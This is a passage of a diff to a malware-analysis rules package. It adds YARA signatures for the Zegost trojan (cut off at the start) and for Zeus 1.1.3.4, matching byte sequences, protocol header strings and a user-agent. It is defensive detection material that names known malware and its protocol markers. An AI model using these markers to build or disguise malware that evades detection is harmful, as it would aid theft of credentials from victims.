+		date="10/06/2013"
+		description="Zegost Trojan"
+		
+	strings:
+		$signature1={39 2F 66 33 30 4C 69 35 75 62 4F 35 44 4E 41 44 44 78 47 38 73 37 36 32 74 71 59 3D}
+		$signature2={00 BA DA 22 51 42 6F 6D 65 00}
+		
+	condition:
+		$signature1 and $signature2
+}
diff -Nru remnux-rules-0.0.3/yara.old/Zeus.yara remnux-rules-0.0.4/yara.old/Zeus.yara
--- remnux-rules-0.0.3/yara.old/Zeus.yara	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara.old/Zeus.yara	2015-05-08 13:13:14.000000000 +0000
@@ -0,0 +1,25 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Windows_Malware : Zeus_1134
+    {
+            meta:
+                    author = "Xylitol xylitol@malwareint.com"
+                    date = "2014-03-03"
+                    description = "Match first two bytes, protocol and string present in Zeus 1.1.3.4"
+                    reference = "http://www.xylibox.com/2014/03/zeus-1134.html"
+                    
+            strings:
+                    $mz = {4D 5A}
+                    $protocol1 = "X_ID: "
+                    $protocol2 = "X_OS: "
+                    $protocol3 = "X_BV: "
+                    $stringR1 = "InitializeSecurityDescriptor"
+                    $stringR2 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"
+            condition:
+                    ($mz at 0 and all of ($protocol*) and ($stringR1 or $stringR2))
+    }